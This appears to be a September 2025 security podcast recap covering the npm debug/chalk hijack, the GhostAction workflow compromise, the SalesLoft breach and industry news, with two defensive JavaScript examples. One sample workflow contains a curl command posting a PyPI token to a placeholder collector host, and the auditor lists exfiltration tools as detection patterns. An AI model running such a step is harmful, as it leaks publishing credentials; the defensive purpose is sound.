Good Morning Security Gang!
It’s Tuesday, September 9th, 2025, and welcome back to the CyberHub Podcast. Today’s show is all about supply chain chaos and M&A shakeups in our industry.
We’re digging into the massive NPM hijack of packages with billions of downloads, a GitHub Actions compromise dubbed GhostAction, fallout from SalesLoft’s GitHub breach, Jaguar Land Rover’s cyber struggles, piracy platforms getting seized, and two big acquisitions—Nozomi Networks and Observo AI.
Double espresso in hand, let’s get into it.
📦 NPM Supply Chain Attack Hits 2 Billion Downloads
The open-source ecosystem took a huge hit as attackers compromised debug and chalk, two foundational NPM packages that together see more than 2 billion downloads a month (they were among a larger set of packages from the same maintainer hit in the same push). Joining me was Neatsun Ziv, CEO of OX Security, to break it down. The attack began with a phishing email to the maintainer, disguised as a request to update two-factor authentication on the account. With the maintainer's npm credentials in hand, the attackers published malicious versions straight to the registry; nothing changed in the projects' source repositories, so a review of the GitHub history would have shown nothing. The payload targeted crypto wallets, tampering with transactions in the browser so that funds were diverted to attacker-controlled addresses.
The real kicker? This wouldn't have shown up in daily SBOM scans. The poisoned versions went live between scan cycles and were pulled again within a couple of hours, so a once-a-day snapshot simply never saw them. Only a control that inspects what is actually being resolved at build time, or a commit-gate check on the lockfile, had a chance to catch them.
As Neatsun noted, “There’s no single strategy—you need dynamic defenses and runtime monitoring in the build pipeline.”
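One build-time control that closes exactly the window described above is a cooling-off gate: refuse to consume any dependency version that was published less than N hours before the build, since a hijacked version is usually reported and pulled within that time. The following is an added example written for this page, not code from the podcast, from OX Security or from the npm project. It reads a package-lock.json v3 "packages" map and the registry's per-version publish times (the time object returned by https://registry.npmjs.org/NAME) and flags anything too fresh. The 48-hour window, the package versions and the timestamps are assumptions and constructed sample data; in a real pipeline the registry metadata would be fetched for each package and the script would fail the build on any finding.

```javascript
// Added example: cooling-off gate for npm dependencies at build time.
// Not the podcast's, OX Security's or npm's own code. Registry metadata is
// passed in as an argument so the check runs offline here.

const MIN_AGE_HOURS = 48; // assumption: two-day cooling-off before a new version may be consumed

// Extract {name, version} for every resolved dependency in a lockfileVersion 3 file.
function resolvedDeps(lock) {
  const deps = [];
  const marker = "node_modules/";
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "") continue; // "" is the root project itself
    // Works for nested paths (a/node_modules/b) and @scoped names.
    const name = path.slice(path.lastIndexOf(marker) + marker.length);
    deps.push({ name, version: entry.version });
  }
  return deps;
}

// Hours between a registry publish timestamp (ISO 8601) and the build time (ms since epoch).
function ageHours(publishedAt, now) {
  return (now - Date.parse(publishedAt)) / 3_600_000;
}

// Returns the dependencies that fail the gate, each with a reason.
// Fails closed: a version the registry metadata does not know is reported
// rather than silently ignored.
function gateLockfile(lock, registryTimes, now, minAgeHours = MIN_AGE_HOURS) {
  const findings = [];
  for (const { name, version } of resolvedDeps(lock)) {
    const times = registryTimes[name];
    if (!times || !times[version]) {
      findings.push({ name, version, reason: "no publish time in registry metadata" });
      continue;
    }
    const age = ageHours(times[version], now);
    if (age < minAgeHours) {
      findings.push({ name, version, reason: `published ${age.toFixed(1)}h ago (< ${minAgeHours}h)` });
    }
  }
  return findings;
}

// Constructed sample data: versions and timestamps are illustrative, not the real incident's.
const SAMPLE_LOCK = {
  name: "example-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "example-app", version: "1.0.0" },
    "node_modules/chalk": { version: "5.0.0", resolved: "https://registry.npmjs.org/chalk/-/chalk-5.0.0.tgz" },
    "node_modules/debug": { version: "4.0.0", resolved: "https://registry.npmjs.org/debug/-/debug-4.0.0.tgz" },
    "node_modules/debug/node_modules/ms": { version: "2.1.3", resolved: "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz" },
  },
};
const SAMPLE_REGISTRY_TIMES = {
  chalk: { created: "2025-01-01T00:00:00.000Z", "5.0.0": "2025-09-09T10:30:00.000Z" }, // pushed 90 minutes before the build
  debug: { created: "2025-01-01T00:00:00.000Z", "4.0.0": "2025-08-01T00:00:00.000Z" },
  // "ms" deliberately absent: the lookup failed or the version is unknown to the registry
};
const SAMPLE_BUILD_TIME = Date.parse("2025-09-09T12:00:00.000Z");

for (const f of gateLockfile(SAMPLE_LOCK, SAMPLE_REGISTRY_TIMES, SAMPLE_BUILD_TIME)) {
  console.log(`BLOCKED ${f.name}@${f.version}: ${f.reason}`);
}
```

Run this as a step before npm ci (which installs exactly what the lockfile says), and the build stops on the two findings in the sample: chalk because it is 1.5 hours old, ms because its metadata is missing. The trade-off is that genuine releases also wait out the window, which is the point: the window buys the ecosystem time to notice and pull a hijacked version before your build ever pulls it.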
🛠 GitHub Workflows Compromised – GhostAction
Security firm GitGuardian uncovered a campaign in which attackers committed a malicious workflow to the FastUUID project. When it ran, the workflow read the repository's secrets, including a PyPI publishing token, and posted them to an attacker-controlled server. The malicious commit was reverted quickly, but it shows how GitHub Actions can be turned against developers and enterprises alike: any secret a workflow can reach, a malicious workflow can ship out. Repositories remain a prime target because that is where API keys, tokens, and credentials end up, as workflow secrets or committed in code, and attackers harvest them at scale.
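A workflow-file audit in CI or in a pre-merge check is the concrete form of the monitoring the action items below call for. The script here is an added example for this page, not GitGuardian's tooling and not code from the FastUUID project. It looks for the two ingredients a GhostAction-style commit relies on: a step that both references a repository secret and runs a command capable of sending data off the runner, and third-party actions pulled by a mutable tag instead of a full commit SHA. The parser is deliberately line-based so it needs no YAML library for the few fields it inspects; the sample workflow, its SHA, and the collector hostname are constructed placeholders, and the list of network-capable commands is an assumption to extend for your environment.

```javascript
// Added example: static audit of a GitHub Actions workflow for secret-exfil
// steps and unpinned third-party actions. Not GitGuardian's or FastUUID's code.

const SHA_PIN = /^[0-9a-f]{40}$/;                              // full commit SHA pin
const SECRET_REF = /\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}/;  // ${{ secrets.NAME }}
// Commands that can move data off the runner. Illustrative list (assumption); extend as needed.
const NETWORK_CMD = /\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b/;
// A list item that opens a mapping ("- uses:", "- name:", "- run:") starts a step.
const STEP_START = /^\s*-\s+[\w-]+:/;

// Split workflow text into steps of {line, text}. Text before the first step
// (name:, on:, the jobs header) is not a step and is dropped.
function splitSteps(yamlText) {
  const steps = [];
  let current = null;
  yamlText.split("\n").forEach((line, idx) => {
    if (STEP_START.test(line)) {
      current = { line: idx + 1, lines: [] };
      steps.push(current);
    }
    if (current) current.lines.push(line);
  });
  return steps.map((s) => ({ line: s.line, text: s.lines.join("\n") }));
}

// Returns findings: actions not pinned to a commit SHA, and steps that both
// reference a repository secret and run a network-capable command.
function auditWorkflow(yamlText) {
  const findings = [];
  for (const step of splitSteps(yamlText)) {
    const uses = step.text.match(/^\s*-?\s*uses:\s*([^\s#]+)/m);
    if (uses) {
      const ref = uses[1];
      const pin = ref.includes("@") ? ref.slice(ref.lastIndexOf("@") + 1) : "";
      const local = ref.startsWith("./") || ref.startsWith("docker://");
      if (!local && !SHA_PIN.test(pin)) {
        findings.push({ line: step.line, kind: "unpinned-action", detail: ref });
      }
    }
    const hasRun = /^\s*-?\s*run:/m.test(step.text);
    if (hasRun && SECRET_REF.test(step.text) && NETWORK_CMD.test(step.text)) {
      findings.push({ line: step.line, kind: "secret-to-network", detail: step.text.match(SECRET_REF)[0] });
    }
  }
  return findings;
}

// Constructed sample workflow. The SHA and the collector host are placeholders.
const SAMPLE_WORKFLOW = [
  "name: release",
  "on: [push]",
  "jobs:",
  "  build:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/checkout@v4",
  "      - uses: actions/setup-python@0123456789abcdef0123456789abcdef01234567",
  "        with:",
  "          python-version: '3.12'",
  "      - name: Build",
  "        run: pip install build && python -m build",
  "      - name: Telemetry",
  "        env:",
  "          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}",
  "        run: |",
  "          curl -s -X POST -d \"token=$PYPI_TOKEN\" https://collector.example/upload",
].join("\n");

for (const f of auditWorkflow(SAMPLE_WORKFLOW)) {
  console.log(`line ${f.line}: ${f.kind} (${f.detail})`);
}
```

On the sample it reports the checkout step (pinned to the tag v4, which a compromised upstream could move) and the "Telemetry" step, where a PyPI token is placed in the environment and then handed to curl. The secret check looks at the whole step rather than only the run: line, which is what catches the common pattern of passing the secret through env: first. A finding on a pull request that touches .github/workflows is a review blocker, not a warning.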
🔑 SalesLoft GitHub Breach – Drift OAuth Fallout
SalesLoft confirmed attackers breached its GitHub account as early as March 2025, downloading code, adding rogue workflows, and creating guest accounts. This paved the way for the Drift OAuth token theft, now tied to more than 22 breached organizations including Google, TransUnion, and Cloudflare. Investigators say the campaign focused on stealing AWS keys, Snowflake tokens, and passwords.
As I said: “This wasn’t singular—it was systematic. And our defense approach has to be just as systematic.”
🚗 Jaguar Land Rover Cyberattack – Impacting UK Growth
Jaguar Land Rover is still reeling from its ransomware incident, with systems offline across manufacturing and retail. Some analysts even warned the outage could impact UK economic growth. I’ll be blunt: Europe already has some of the strictest regulations, yet here we are. Regulation alone won’t stop these attacks. Without resilience and disincentives for attackers, governments will continue to see critical industries disrupted.
⚽ Calcio Sports Piracy Platform Seized
Following the takedown of StreamEast, authorities seized Calcio, a Moldova-based piracy streaming platform with 120M annual visits. Over 80% of its traffic came from Italy, but users spanned Spain, the U.S., Germany, and France. Domains now redirect to the ACE “Watch Legally” portal.
💼 M&A News – Nozomi & SentinelOne
Mitsubishi Electric acquired Nozomi Networks for nearly $1B, its largest acquisition ever. Mitsubishi previously held a minority stake but now owns it outright.
SentinelOne will acquire Observo AI, a California-based AI-native data pipeline startup, for $225M in cash. This follows SentinelOne’s milestone of surpassing $1B ARR and bolsters its DevOps and security data pipeline offerings.
🧠 James Azar’s CISO Take
What struck me most about today's discussion with Neatsun is how the NPM attack used the promise of better security - two-factor authentication - as the attack vector itself. This level of sophistication in social engineering, combined with AI-enhanced phishing capabilities, shows we're dealing with adversaries who understand not just our technical infrastructure but our security mindset. The fact that this attack could only be detected through commit-gate scanning, not traditional daily SBOM scans, reveals a massive blind spot in how most organizations approach supply chain security. We're not just dealing with individual incidents anymore - these are systematic, coordinated campaigns designed to harvest credentials and establish persistent access across entire ecosystems.
The broader lesson here is that our defense strategies need to evolve from reactive scanning to proactive, real-time monitoring of everything flowing through our development pipelines. Whether it's NPM packages, GitHub workflows, or the SalesLoft breach that started in March and cascaded through multiple organizations, we're seeing attackers operate with patience and systematic methodology that requires equally systematic defensive approaches. And frankly, while Europe continues to pile on regulations (which I find absolutely disgusting), the real solution isn't more bureaucracy - it's making attacks economically unviable while building resilient systems that can detect and respond to these sophisticated campaigns in real-time.
The final takeaway is that scale matters in cyber resilience. Jaguar Land Rover’s disruption highlights how fragile economies can be when a single company outage ripples outward. On the flip side, we’re seeing consolidation and investment in resilience - Mitsubishi and SentinelOne are betting billions on OT security and AI-native pipelines. If attackers are systematic, our defenses and industry strategies must be systematic too.
✅ Action Items
📦 Pin and lock dependency versions (commit the lockfile and install from it with npm ci); generate SBOMs at build time from what was actually resolved, not from a daily snapshot.
🔐 Monitor GitHub Actions workflows for unauthorized changes: require review for anything under .github/workflows, pin third-party actions to commit SHAs, and scope repository secrets to the environments that need them.
🔑 Rotate OAuth tokens, AWS keys, and Snowflake credentials exposed to third-party apps, and revoke integrations you no longer use.
🚗 Separate IT/OT systems in manufacturing to reduce ransomware blast radius.
📊 Audit supply chain risk beyond tier-1 vendors—track fourth-party dependencies.
⚽ Watch piracy enforcement trends if your org touches sports/media rights.
💼 Track M&A trends in OT and AI security for potential consolidation impacts.